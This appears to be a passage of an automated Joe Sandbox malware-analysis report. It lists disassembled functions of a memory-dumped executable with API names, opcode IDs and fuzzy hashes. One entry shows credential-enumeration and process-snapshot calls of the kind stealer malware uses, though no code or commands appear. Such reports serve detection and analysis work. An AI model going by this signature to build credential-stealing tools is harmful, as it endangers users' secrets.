                                                                                                    • Instruction Fuzzy Hash: BE41AE62B0874A85FE10BA22A5043B9E252EF08FD4F984A71DE6D0B7D6DE3CD5429360
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: fe0d51e385815fee322eb5e0ef6231c1a84a588b8a751bfb4256bf6f17b6a014
                                                                                                    • Instruction ID: 23e72c30b1a7d5cf3258dbba215c360823ccc91f7936485cb0651895395ac000
                                                                                                    • Opcode Fuzzy Hash: fe0d51e385815fee322eb5e0ef6231c1a84a588b8a751bfb4256bf6f17b6a014
                                                                                                    • Instruction Fuzzy Hash: 7831CF61B0978A85FE14AF11A5442A9E692EF08FD4F9C06B2DE6D0B786DE3CE4428310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationVolume_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 4269842375-0
                                                                                                    • Opcode ID: d1eda828ff3a42b1bd9c341c65f52878687d5427d7f2884afc125289b27a9beb
                                                                                                    • Instruction ID: de165b99b823501ede88788740c8a87c8ae75c76d501b12f529836d48299ef4a
                                                                                                    • Opcode Fuzzy Hash: d1eda828ff3a42b1bd9c341c65f52878687d5427d7f2884afc125289b27a9beb
                                                                                                    • Instruction Fuzzy Hash: D8519E33A18B8285F710DF68D4403ADB7A1FB98788F945635EB8C53A99DF78D581C740
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 2371198981-0
                                                                                                    • Opcode ID: 69cb05f06bfac6c23d9b563a1144b6f5c1505051c04b41afb44361278751c17a
                                                                                                    • Instruction ID: eb6fb5a6dbcb8e7d9667db2c56389a9a52352abd04f3f34026546e0e405fb053
                                                                                                    • Opcode Fuzzy Hash: 69cb05f06bfac6c23d9b563a1144b6f5c1505051c04b41afb44361278751c17a
                                                                                                    • Instruction Fuzzy Hash: E821D622E19B4A45FA28BB25A500379A2D1EF58FA4F584771DA7C07BD1EE3CD8D38350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
                                                                                                    • Instruction ID: 5085427a978abdb6afad4e66ee316a4127da7f7695c46d24413938c81f223a13
                                                                                                    • Opcode Fuzzy Hash: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
                                                                                                    • Instruction Fuzzy Hash: 2931BF32A19A4281FA50FF14DC601B9A760BF99B90FD909B0E70E47392EE3DE1018B20
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 47109696-0
                                                                                                    • Opcode ID: 1a64ac96ffafbd9bf205c43160686ecd2fbbda4846f4ad75e4a512c060860e71
                                                                                                    • Instruction ID: 0b532b560b420d324e3e43f87d5392552ae149f6a2368ca19bfab8c12b8fcd71
                                                                                                    • Opcode Fuzzy Hash: 1a64ac96ffafbd9bf205c43160686ecd2fbbda4846f4ad75e4a512c060860e71
                                                                                                    • Instruction Fuzzy Hash: BA21B461B18A4186FE50AB25E8403BAE361EF98FD8F9C5175EA4D43B95DF2CD4818720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: ba28abc32b171e9d6c9b56ec2aae1ad1df347358e42700194b560561e1ef2914
                                                                                                    • Instruction ID: 2aca6bdb9b760816a07c8ceaf1acaf686fa754159fdfd376e6ee10c69cae6f08
                                                                                                    • Opcode Fuzzy Hash: ba28abc32b171e9d6c9b56ec2aae1ad1df347358e42700194b560561e1ef2914
                                                                                                    • Instruction Fuzzy Hash: 5E1104A2B12B8949FF08AF74E45437CB392EF18F94F984970DA6C46785DF2CC8918300
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
                                                                                                    • String ID:
                                                                                                    • API String ID: 420082584-0
                                                                                                    • Opcode ID: 442cc80d2267274907e8166eae868d28a8a8e36d3e2b5ea7fa1f6c8ea05d9a82
                                                                                                    • Instruction ID: a68d873ad1e1c5c4fc68b91468042479cc45e1b9df554a242b9c465415c08a1a
                                                                                                    • Opcode Fuzzy Hash: 442cc80d2267274907e8166eae868d28a8a8e36d3e2b5ea7fa1f6c8ea05d9a82
                                                                                                    • Instruction Fuzzy Hash: 04219D11E0C28381FA907BB4A1263BFD642EF99F90FCC5AB5E66E055C79E1DA0418672
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleMutexReleaserecv
                                                                                                    • String ID:
                                                                                                    • API String ID: 2659716615-0
                                                                                                    • Opcode ID: 4d6352119ee6fae63bc1b356387a477c1694add6d7aa960eadc6853682fe7d5c
                                                                                                    • Instruction ID: baba4be4b22352cfe4bd05bd1d8d2b29a98ce592ebceeaedf2a8b18a1697a5dd
                                                                                                    • Opcode Fuzzy Hash: 4d6352119ee6fae63bc1b356387a477c1694add6d7aa960eadc6853682fe7d5c
                                                                                                    • Instruction Fuzzy Hash: 1C110612E0C2C381FA507B34A5163BFD642EF99F50FCC5AB4EAAE456C79E1CE0418671
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF75A710E88,?,?,?,?,00000000,00007FF75A710F91), ref: 00007FF75A710EE8
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF75A710E88,?,?,?,?,00000000,00007FF75A710F91), ref: 00007FF75A710EF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
                                                                                                    • Instruction ID: 3bd55e3acb81c328a85a8b6423369c3cda05fbc50acf1dccea154b3457c0e08b
                                                                                                    • Opcode Fuzzy Hash: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
                                                                                                    • Instruction Fuzzy Hash: E911BF61A18B8281EA10EF26A404069A7A1EF48BF4F9C4771EA7D0B7D9CE7CD4568780
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1173176844-0
                                                                                                    • Opcode ID: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
                                                                                                    • Instruction ID: 0e0f77df64f7fb15eeeba03793e5f6f93be389fe01f656059210f24c206f1123
                                                                                                    • Opcode Fuzzy Hash: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
                                                                                                    • Instruction Fuzzy Hash: 1BE0EC00F1920B59FE283A62190517580C48F8DB70E9C2FB0D97D482C3AE2CB59182F0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
                                                                                                    • Instruction ID: bd507927f9a2adf72a22aa37942ac361b83863b9cb35bda551dcabe7c30c1056
                                                                                                    • Opcode Fuzzy Hash: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
                                                                                                    • Instruction Fuzzy Hash: 4CE01245F0A70692FE187FF29C45075D2917F9C740FCC4CB4DA1E82292ED2C69858634
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75A6C0610: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75A6C0778
                                                                                                      • Part of subcall function 00007FF75A6C0610: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75A6C0784
                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75A6B447D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                    • String ID:
                                                                                                    • API String ID: 3936042273-0
                                                                                                    • Opcode ID: a096e6afe43b4a60c4f89eac60ba77c0d5c5e009f354000b0d567cc97446c98a
                                                                                                    • Instruction ID: dc80c7ca480d859ed97ac5f6004f6befadcf91cad38fd1913757beeee68a6506
                                                                                                    • Opcode Fuzzy Hash: a096e6afe43b4a60c4f89eac60ba77c0d5c5e009f354000b0d567cc97446c98a
                                                                                                    • Instruction Fuzzy Hash: CFE15822B18B4984FB10EB65E4442ADB772FB44B98F894576CF5D17B9ACF38D890C360
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: af28a2458ac18bf6793613d409dbb9ce21ecec15dfcf46b87960a54d9631e338
                                                                                                    • Instruction ID: 0cec1912344267f61bfa9a612c02c4da5cd0a72928f4a0e9de6124bdcd3999d5
                                                                                                    • Opcode Fuzzy Hash: af28a2458ac18bf6793613d409dbb9ce21ecec15dfcf46b87960a54d9631e338
                                                                                                    • Instruction Fuzzy Hash: 35B19B72704B848AEB20DF25D0902ACB7A5FB48B58F895672EA5E47B98DF38D855C310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: 3476069c0fa1cf4b55027b6adf788e79bbea7519a4c0839250e036c88389afe2
                                                                                                    • Instruction ID: 4df8903da5945f46200a75334838e194524e03e625b877605045193f8cf305bd
                                                                                                    • Opcode Fuzzy Hash: 3476069c0fa1cf4b55027b6adf788e79bbea7519a4c0839250e036c88389afe2
                                                                                                    • Instruction Fuzzy Hash: 4C51C612F08A828AFB119F78D4403BCB372EF54B4CF485671DF4D26A99DF38A5968364
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
                                                                                                    • Instruction ID: 16773a9603e51fbbad0ed6b62b969f94056d0ac0832ac9276591be2e50cebb21
                                                                                                    • Opcode Fuzzy Hash: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
                                                                                                    • Instruction Fuzzy Hash: 2641D736A1834187FB64AF18D941279B7A0FF9A751F980970D69E836D2DF2CE502CB70
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: 64e668885338bf2eac2e1347390ae7b37dbc7c366067bac987201ba3635f5159
                                                                                                    • Instruction ID: ed0f8dc355aa3701cdf839e3958982855380568034ac447b3f962b913ba547a5
                                                                                                    • Opcode Fuzzy Hash: 64e668885338bf2eac2e1347390ae7b37dbc7c366067bac987201ba3635f5159
                                                                                                    • Instruction Fuzzy Hash: DD414B72B15B498EFB008FB9D4413AC73B2E74CB98F405625EE9C66B89EE3481648394
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
